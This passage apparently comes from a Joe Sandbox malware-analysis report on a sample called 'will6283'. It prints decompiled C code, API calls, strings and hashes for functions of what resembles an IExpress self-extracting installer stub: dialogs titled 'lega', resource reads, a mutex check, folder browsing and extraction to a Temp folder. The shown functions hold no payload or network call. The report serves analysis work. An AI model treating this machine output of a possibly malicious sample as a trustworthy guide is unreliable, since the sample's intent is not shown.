				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x01066cf7
0x01066d00
0x01066d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,01066E26,01061000), ref: 01066CF7
UnhandledExceptionFilter.KERNEL32(01066E26,?,01066E26,01061000), ref: 01066D00
GetCurrentProcess.KERNEL32(C0000409,?,01066E26,01061000), ref: 01066D0B
TerminateProcess.KERNEL32(00000000,?,01066E26,01061000), ref: 01066D12

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 6d833ce3873059986ce681b7c21b30bea777241fb658f4eb8e728b129df6720d
Instruction ID: 1576bf11cf3a02100cb3b2908629c0b15fa49bc99e7f2f9e07630f704d4644eb
Opcode Fuzzy Hash: 6d833ce3873059986ce681b7c21b30bea777241fb658f4eb8e728b129df6720d
Instruction Fuzzy Hash: ACD01232200108FBDB203BF1E80CA593F28FB48392F444000F35DAB024CB3B9451CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01063210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E01063210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E010643D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lega");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x1069a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10691e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010644B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10691e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10691e5 - 3;
						if(_t49 - 0x10691e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10691e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10691e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0106658A(0x10691e4, 0x104, 0x1061140);
								_t27 = E010658C8(0x10691e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10691e4 - 0x5c;
									if( *0x10691e4 != 0x5c) {
										L30:
										_t30 = E0106597D(0x10691e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10691e5 - 0x5c;
									if( *0x10691e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010644B9(_t64, 0x54a, 0x10691e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10691e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10691e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10691e4 - 0x5c;
						if( *0x10691e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x1069124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x1069a3c, 0x3e8, 0x1068598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E01064224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10687a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010644B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0106321b
0x0106321e
0x01063221
0x0106343c
0x0106343e
0x0106343f
0x01063445
0x01063447
0x00000000
0x01063447
0x01063229
0x0106322a
0x0106322f
0x010633ec
0x010633f7
0x01063410
0x01063416
0x0106341d
0x0106342d
0x0106342d
0x01063438
0x00000000
0x01063438
0x01063237
0x01063243
0x01063243
0x01063246
0x010632ee
0x010632f4
0x010632f6
0x010633d4
0x010633d6
0x010633db
0x010633dc
0x010633de
0x010633df
0x01063370
0x01063372
0x00000000
0x01063372
0x010632fc
0x01063301
0x01063301
0x01063303
0x01063304
0x01063304
0x0106330a
0x0106330d
0x00000000
0x00000000
0x01063313
0x01063318
0x0106331a
0x01063331
0x01063332
0x0106333a
0x0106333d
0x0106337c
0x01063388
0x0106338f
0x01063394
0x01063396
0x010633a4
0x010633ab
0x010633b6
0x010633be
0x010633c3
0x010633c5
0x01063435
0x01063437
0x01063437
0x00000000
0x01063437
0x010633c7
0x010633c9
0x010633cc
0x00000000
0x010633cc
0x010633ad
0x010633b4
0x00000000
0x00000000
0x00000000
0x010633b4
0x01063398
0x01063399
0x0106339b
0x0106339c
0x0106339d
0x00000000
0x0106339d
0x0106334c
0x01063351
0x01063354
0x00000000
0x00000000
0x0106335c
0x01063362
0x01063364
0x00000000
0x00000000
0x01063366
0x01063367
0x01063369
0x0106336a
0x0106336b
0x00000000
0x0106336b
0x0106331c
0x01063323
0x00000000
0x00000000
0x01063329
0x0106332b
0x00000000
0x00000000
0x00000000
0x0106332b
0x0106324c
0x0106324c
0x0106324f
0x010632c8
0x010632ce
0x00000000
0x010632ce
0x01063251
0x01063256
0x00000000
0x00000000
0x01063271
0x01063277
0x01063279
0x01063298
0x0106329d
0x0106329f
0x00000000
0x00000000
0x010632b0
0x010632b6
0x010632b8
0x00000000
0x00000000
0x010632be
0x01063280
0x01063289
0x0106328e
0x00000000
0x0106328e
0x0106327b
0x00000000
0x0106327b
0x00000000

APIs

LoadStringA.USER32(000003E8,01068598,00000200), ref: 01063271
GetDesktopWindow.USER32 ref: 010633E2
SetWindowTextA.USER32(?,lega), ref: 010633F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01063410
GetDlgItem.USER32(?,00000836), ref: 01063426
EnableWindow.USER32(00000000), ref: 0106342D
EndDialog.USER32(?,00000000), ref: 0106343F

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010632E2, 010632E7, 01063331, 01063344, 0106335B, 0106336A
lega, xrefs: 010633F1

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lega
API String ID: 2418873061-1526836103
Opcode ID: 8f4065014b70a840bd247e5cbbf8f90ff4332b7084d106ec089c41703fb71ee1
Instruction ID: ff368d0752addf15fe513067042561e84210777cf9d28e775626aa43e453faa8
Opcode Fuzzy Hash: 8f4065014b70a840bd247e5cbbf8f90ff4332b7084d106ec089c41703fb71ee1
Instruction Fuzzy Hash: 9B51C570341251FAFB726A395C4CF7B699DBB45B54F108028F6C9EE5D5CEAA940183E0

Uniqueness

Uniqueness Score: -1.00%

Function 01062CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01062CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x1068004; // 0x19e58fb5
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x1069a3c = __ecx;
				memset(0x1069140, 0, 0x8fc);
				memset(0x1068a20, 0, 0x32c);
				memset(0x10688c0, 0, 0x104);
				 *0x10693ec = 1;
				_t20 = E0106468F("TITLE", 0x1069154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x106858c = _t27;
					SetEvent(_t27);
					_t64 = 0x1069a34;
					if(E0106468F("EXTRACTOPT", 0x1069a34, 4) != 0) {
						if(( *0x1069a34 & 0x000000c0) == 0) {
							L12:
							 *0x1069120 =  *0x1069120 & _t65;
							if(E01065C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x1068a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x1068184 != 0) {
										__imp__#17();
									}
									if( *0x1068a24 == 0) {
										_t57 = _t65;
										if(E010636EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x1069a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x1069a34 & 0x00000100) == 0 || ( *0x1068a38 & 0x00000001) != 0 || E010618A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E01066517(_t57, 0x7d6, _t34, E010619E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E01062390(0x1068a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E010644B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0106468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x1068588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x1069a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E010644B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E010644B9(0, 0x54b, "lega", 0, 0x10, 0);
										L11:
										CloseHandle( *0x1068588);
										 *0x1069124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x1069124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E01066CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x01062cb5
0x01062cbc
0x01062cc7
0x01062cc9
0x01062cd1
0x01062cd3
0x01062cd9
0x01062ce9
0x01062cf9
0x01062d0e
0x01062d15
0x01062d1c
0x01062ef3
0x00000000
0x01062d2d
0x01062d34
0x01062d3b
0x01062d40
0x01062d48
0x01062d59
0x01062d84
0x01062e1f
0x01062e1f
0x01062e2e
0x01062e41
0x01062e5a
0x01062e62
0x01062e6c
0x01062e6c
0x01062e75
0x01062e77
0x01062e77
0x01062e84
0x01062e8b
0x01062e94
0x00000000
0x01062e96
0x01062e96
0x01062e9e
0x01062ea2
0x01062eba
0x00000000
0x01062ece
0x01062ede
0x01062eed
0x00000000
0x00000000
0x00000000
0x00000000
0x01062eed
0x01062eef
0x01062eef
0x01062eef
0x01062eef
0x01062ea2
0x01062e86
0x01062e88
0x01062e88
0x01062e43
0x01062e48
0x00000000
0x01062e48
0x01062e30
0x01062e30
0x01062ef8
0x01062f01
0x00000000
0x01062f01
0x01062d8a
0x01062d8f
0x01062da1
0x00000000
0x01062da3
0x01062dae
0x01062db4
0x01062dbb
0x00000000
0x01062dca
0x01062dd3
0x01062df5
0x01062e02
0x00000000
0x00000000
0x00000000
0x00000000
0x01062dd5
0x01062dde
0x01062de3
0x01062e04
0x01062e0a
0x01062e10
0x00000000
0x01062e10
0x01062dd3
0x01062dbb
0x01062da1
0x01062d5b
0x01062d5b
0x01062d5d
0x01062d69
0x01062d6e
0x01062f06
0x01062f06
0x01062f06
0x01062d59
0x01062f18

APIs

memset.MSVCRT ref: 01062CD9
memset.MSVCRT ref: 01062CE9
memset.MSVCRT ref: 01062CF9

Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646A0
Part of subcall function 0106468F: SizeofResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646A9
Part of subcall function 0106468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010646C3
Part of subcall function 0106468F: LoadResource.KERNEL32(00000000,00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646CC
Part of subcall function 0106468F: LockResource.KERNEL32(00000000,?,01062D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010646D3
Part of subcall function 0106468F: memcpy_s.MSVCRT ref: 010646E5
Part of subcall function 0106468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010646EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01062D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01062D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01062DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01062DBD
CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01062E0A

Part of subcall function 010644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01064518
Part of subcall function 010644B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 01064554

Strings

TITLE, xrefs: 01062D09
EXTRACTOPT, xrefs: 01062D4D
INSTANCECHECK, xrefs: 01062D95
lega, xrefs: 01062D04, 01062DD9, 01062DF0
VERCHECK, xrefs: 01062E54

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
API String ID: 1002816675-2051202908
Opcode ID: 0ce05f384e6f1c0fd01021c2302d070debda6850256913013bc844abbd96d5af
Instruction ID: 99a3388aa6dc7a97141060776444e26f862b2350f10d17229451dbaf23eaec59
Opcode Fuzzy Hash: 0ce05f384e6f1c0fd01021c2302d070debda6850256913013bc844abbd96d5af
Instruction Fuzzy Hash: 3351F770340302AAFB70A6299D49B7B36DDEB95704F004039FAC1DA5D8DBBD8881C761

Uniqueness

Uniqueness Score: -1.00%

Function 010634F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E010634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x10691d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x1068584 = _t35;
					E010643D0(_t35, GetDesktopWindow());
					__eflags =  *0x1068184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lega");
					_t17 = CreateThread(0, 0, E01064FE0, 0, 0, 0x1068798);
					 *0x106879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E010644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x106858c);
					_t38 =  *0x1068584; // 0x0
					_t25 = E010644B9(_t38, 0x4b2, 0x1061140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x10691d8 = 1;
						SetEvent( *0x106858c);
						_t39 =  *0x106879c; // 0x0
						E01063680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x106858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x106879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x010634fb
0x010634fe
0x01063665
0x01063666
0x01063666
0x01063668
0x0106366e
0x0106366e
0x01063671
0x01063671
0x01063677
0x00000000
0x01063677
0x01063504
0x01063506
0x01063507
0x0106350c
0x0106365b
0x0106365f
0x00000000
0x00000000
0x00000000
0x01063661
0x01063512
0x01063515
0x010635be
0x010635c1
0x010635d1
0x010635d8
0x010635de
0x010635f8
0x01063617
0x01063617
0x01063623
0x01063637
0x0106363d
0x01063642
0x01063644
0x00000000
0x01063646
0x01063652
0x01063657
0x01063658
0x00000000
0x01063658
0x01063644
0x0106351b
0x0106351d
0x0106354f
0x01063553
0x00000000
0x00000000
0x0106355f
0x01063565
0x0106357c
0x01063581
0x01063584
0x0106359b
0x010635a1
0x010635a7
0x010635ad
0x010635b3
0x010635b8
0x00000000
0x010635b8
0x01063586
0x01063588
0x00000000
0x00000000
0x01063590
0x00000000
0x01063590
0x01063524
0x01063535
0x01063541
0x00000000
0x01063549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 01063535
EndDialog.USER32(?,?), ref: 01063541
ResetEvent.KERNEL32 ref: 0106355F
SetEvent.KERNEL32(01061140,00000000,00000020,00000004), ref: 01063590
GetDesktopWindow.USER32 ref: 010635C7
GetDlgItem.USER32(?,0000083B), ref: 010635F1
SendMessageA.USER32(00000000), ref: 010635F8
GetDlgItem.USER32(?,0000083B), ref: 01063610
SendMessageA.USER32(00000000), ref: 01063617
SetWindowTextA.USER32(?,lega), ref: 01063623
CreateThread.KERNEL32 ref: 01063637
EndDialog.USER32(?,00000000), ref: 01063671

Strings

lega, xrefs: 0106361D

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lega
API String ID: 2406144884-245445314
Opcode ID: 5be70d12100ed1ddd8c87dda148a45f2e9dae039896a190a43f942926a331df9
Instruction ID: c0c0eed38c03c37f29a90793f628d2f7ed3e0d787baa8974bb14711bc0abdf84
Opcode Fuzzy Hash: 5be70d12100ed1ddd8c87dda148a45f2e9dae039896a190a43f942926a331df9
Instruction Fuzzy Hash: 1D318A71240311FBD7701F29AC4DE2A3EACF789B55F108519F7C5AE2A8CB7A8810CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01064224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01064224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E010644B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x10688c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x10687a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x1068598;
					_v36 = 1;
					_v32 = E01064200;
					_v28 = 0x10688c0;
					 *0x106a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x106a288(_t32, 0x10688c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x10688c0 != 0) {
							E01061680(0x10687a0, 0x104, 0x10688c0);
						}
						 *0x106a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x10687a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x10688c0);
					_t61 = 0x10688c0;
					_t4 =  &(_t61[1]); // 0x10688c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x10688c0; // 0x20d1181
					_t44 = CharPrevA(0x10688c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x10688c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x01064234
0x0106423c
0x01064240
0x010643b2
0x010643b7
0x010643c0
0x00000000
0x010643c5
0x0106424c
0x01064252
0x01064257
0x010643a4
0x010643a5
0x010643ab
0x00000000
0x010643ab
0x01064263
0x01064269
0x0106426e
0x00000000
0x00000000
0x0106427a
0x01064280
0x01064285
0x00000000
0x00000000
0x0106428d
0x01064293
0x010642e6
0x010642e9
0x010642ef
0x010642f4
0x010642f7
0x01064300
0x01064307
0x0106430e
0x01064315
0x0106431c
0x01064322
0x01064326
0x0106432d
0x0106432d
0x0106432f
0x01064334
0x01064343
0x01064349
0x0106434d
0x01064354
0x01064354
0x0106435d
0x0106436e
0x0106436e
0x0106437d
0x01064383
0x01064387
0x0106438e
0x0106438e
0x01064387
0x01064391
0x01064399
0x00000000
0x01064295
0x0106429f
0x010642a5
0x010642aa
0x010642aa
0x010642ad
0x010642ad
0x010642af
0x010642b0
0x010642b6
0x010642c2
0x010642c8
0x010642ce
0x010642e4
0x010642e4
0x00000000
0x010642ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01064236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0106424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 01064263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0106427A
GetTempPathA.KERNEL32(00000104,010688C0,?,00000001), ref: 0106429F
CharPrevA.USER32(010688C0,020D1181,?,00000001), ref: 010642C2
CharPrevA.USER32(010688C0,00000000,?,00000001), ref: 010642D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01064391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010643A5

Strings

SHELL32.DLL, xrefs: 0106422F
SHGetPathFromIDList, xrefs: 01064274
SHBrowseForFolder, xrefs: 01064246

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 0df433236e1b446634dc7cae68f5bb0b68d4a3209808aa841606e4a66523ba73
Instruction ID: 9c523f4e19cd190ca31a8bdb6a25d99e64e8c57b4dae61f98bcd86d2a34550e1
Opcode Fuzzy Hash: 0df433236e1b446634dc7cae68f5bb0b68d4a3209808aa841606e4a66523ba73
Instruction Fuzzy Hash: 80410BB4A00315EFE721AF78E8849AE7FBCEB45344F04819AEAC1E7255CB798841C770

Uniqueness

Uniqueness Score: -1.00%

Function 01062773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E01062773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x1068004; // 0x19e58fb5
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
